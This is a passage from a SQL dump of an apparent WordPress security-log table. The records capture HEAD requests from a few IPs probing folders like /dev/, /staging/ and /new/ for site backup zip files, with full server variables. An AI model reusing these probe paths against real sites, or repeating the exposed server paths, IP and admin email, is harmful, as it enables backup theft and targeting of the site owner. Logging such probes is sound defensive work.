18:00:14',35128872,36939304,'http://bintara.com.my/news/bintara.com.my.zip',1,0,'190.107.177.250'),(27235,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/newsite/bintara.com.my.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"http://bintara.com.my/newsite/bintara.com.my.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/newsite/bintara.com.my.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5OKqTYgRwQdJ@9I7BUaQAAAIs\";s:12:\"REDIRECT_URL\";s:27:\"/newsite/bintara.com.my.zip\";s:11:\"REMOTE_ADDR\";s:15:\"190.107.177.250\";s:11:\"REMOTE_PORT\";s:5:\"55584\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"http://bintara.com.my/newsite/bintara.com.my.zip\";s:10:\"SCRIPT_URL\";s:27:\"/newsite/bintara.com.my.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5OKqTYgRwQdJ@9I7BUaQAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607213.4221\";s:12:\"REQUEST_TIME\";s:10:\"1569607213\";}}','notice','2019-09-27 18:00:16','2019-09-27 18:00:14',35127496,36933280,'http://bintara.com.my/newsite/bintara.com.my.zip',1,0,'190.107.177.250'),(27236,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/demo/bintara.com.my.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"http://bintara.com.my/demo/bintara.com.my.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/demo/bintara.com.my.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5OKqTYgRwQdJ@9I7BUagAAAI0\";s:12:\"REDIRECT_URL\";s:24:\"/demo/bintara.com.my.zip\";s:11:\"REMOTE_ADDR\";s:15:\"190.107.177.250\";s:11:\"REMOTE_PORT\";s:5:\"55580\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"http://bintara.com.my/demo/bintara.com.my.zip\";s:10:\"SCRIPT_URL\";s:24:\"/demo/bintara.com.my.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5OKqTYgRwQdJ@9I7BUagAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569607213.395\";s:12:\"REQUEST_TIME\";s:10:\"1569607213\";}}','notice','2019-09-27 18:00:16','2019-09-27 18:00:14',35127144,36936704,'http://bintara.com.my/demo/bintara.com.my.zip',1,0,'190.107.177.250'),(27237,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/new/bintara.com.my.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"http://bintara.com.my/new/bintara.com.my.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/new/bintara.com.my.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5OKnHYVBlg0Ecqvi9VBwAAAFU\";s:12:\"REDIRECT_URL\";s:23:\"/new/bintara.com.my.zip\";s:11:\"REMOTE_ADDR\";s:15:\"190.107.177.250\";s:11:\"REMOTE_PORT\";s:5:\"55582\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"http://bintara.com.my/new/bintara.com.my.zip\";s:10:\"SCRIPT_URL\";s:23:\"/new/bintara.com.my.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5OKnHYVBlg0Ecqvi9VBwAAAFU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607213.3943\";s:12:\"REQUEST_TIME\";s:10:\"1569607213\";}}','notice','2019-09-27 18:00:16','2019-09-27 18:00:13',35125928,36936408,'http://bintara.com.my/new/bintara.com.my.zip',1,0,'190.107.177.250'),(27238,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/wordpress/bintara.com.my.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"http://bintara.com.my/wordpress/bintara.com.my.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/wordpress/bintara.com.my.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5OKpB8LtYU@MYZI46mRgAAARI\";s:12:\"REDIRECT_URL\";s:29:\"/wordpress/bintara.com.my.zip\";s:11:\"REMOTE_ADDR\";s:15:\"190.107.177.250\";s:11:\"REMOTE_PORT\";s:5:\"55576\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"http://bintara.com.my/wordpress/bintara.com.my.zip\";s:10:\"SCRIPT_URL\";s:29:\"/wordpress/bintara.com.my.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5OKpB8LtYU@MYZI46mRgAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607213.4076\";s:12:\"REQUEST_TIME\";s:10:\"1569607213\";}}','notice','2019-09-27 18:00:18','2019-09-27 18:00:14',35126064,36934584,'http://bintara.com.my/wordpress/bintara.com.my.zip',1,0,'190.107.177.250'),(27239,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/staging/bintara.com.my.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"http://bintara.com.my/staging/bintara.com.my.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/staging/bintara.com.my.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5OKnKlfXTtZ68oOVBX4AAAAVY\";s:12:\"REDIRECT_URL\";s:27:\"/staging/bintara.com.my.zip\";s:11:\"REMOTE_ADDR\";s:15:\"190.107.177.250\";s:11:\"REMOTE_PORT\";s:5:\"55578\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"http://bintara.com.my/staging/bintara.com.my.zip\";s:10:\"SCRIPT_URL\";s:27:\"/staging/bintara.com.my.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5OKnKlfXTtZ68oOVBX4AAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607213.4347\";s:12:\"REQUEST_TIME\";s:10:\"1569607213\";}}','notice','2019-09-27 18:00:18','2019-09-27 18:00:14',35128600,36943824,'http://bintara.com.my/staging/bintara.com.my.zip',1,0,'190.107.177.250'),(27240,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/dev/bintara.com.my.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"http://bintara.com.my/dev/bintara.com.my.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/dev/bintara.com.my.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5OKnKlfXTtZ68oOVBX3wAAAUE\";s:12:\"REDIRECT_URL\";s:23:\"/dev/bintara.com.my.zip\";s:11:\"REMOTE_ADDR\";s:15:\"190.107.177.250\";s:11:\"REMOTE_PORT\";s:5:\"55588\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"http://bintara.com.my/dev/bintara.com.my.zip\";s:10:\"SCRIPT_URL\";s:23:\"/dev/bintara.com.my.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5OKnKlfXTtZ68oOVBX3wAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607213.4484\";s:12:\"REQUEST_TIME\";s:10:\"1569607213\";}}','notice','2019-09-27 18:00:18','2019-09-27 18:00:14',35125112,36933776,'http://bintara.com.my/dev/bintara.com.my.zip',1,0,'190.107.177.250'),(27241,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp2/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/wp2/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp2/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc9s@3O4E744khfb@UQAAAAo\";s:12:\"REDIRECT_URL\";s:16:\"/wp2/bintara.zip\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.68\";s:11:\"REMOTE_PORT\";s:5:\"56554\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/wp2/bintara.zip\";s:10:\"SCRIPT_URL\";s:16:\"/wp2/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc9s@3O4E744khfb@UQAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607283.8486\";s:12:\"REQUEST_TIME\";s:10:\"1569607283\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35125736,36928320,'http://bintara.com.my/wp2/bintara.zip',1,0,'177.53.143.68'),(27242,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/staging/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/staging/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/staging/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc3HYVBlg0Ecqvi9VFQAAAE0\";s:12:\"REDIRECT_URL\";s:20:\"/staging/bintara.zip\";s:11:\"REMOTE_ADDR\";s:14:\"103.14.122.123\";s:11:\"REMOTE_PORT\";s:5:\"55194\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/staging/bintara.zip\";s:10:\"SCRIPT_URL\";s:20:\"/staging/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc3HYVBlg0Ecqvi9VFQAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607284.2513\";s:12:\"REQUEST_TIME\";s:10:\"1569607284\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35125280,36925208,'http://bintara.com.my/staging/bintara.zip',1,0,'103.14.122.123'),(27243,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/portal/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/portal/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/portal/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc6TYgRwQdJ@9I7BUbwAAAIk\";s:12:\"REDIRECT_URL\";s:19:\"/portal/bintara.zip\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.68\";s:11:\"REMOTE_PORT\";s:5:\"56556\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/portal/bintara.zip\";s:10:\"SCRIPT_URL\";s:19:\"/portal/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc6TYgRwQdJ@9I7BUbwAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607284.1406\";s:12:\"REQUEST_TIME\";s:10:\"1569607284\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:25',35123600,36933768,'http://bintara.com.my/portal/bintara.zip',1,0,'177.53.143.68'),(27244,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/new/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/new/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/new/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc3KlfXTtZ68oOVBX6QAAAUo\";s:12:\"REDIRECT_URL\";s:16:\"/new/bintara.zip\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.68\";s:11:\"REMOTE_PORT\";s:5:\"56564\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/new/bintara.zip\";s:10:\"SCRIPT_URL\";s:16:\"/new/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc3KlfXTtZ68oOVBX6QAAAUo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607284.1512\";s:12:\"REQUEST_TIME\";s:10:\"1569607284\";}}','notic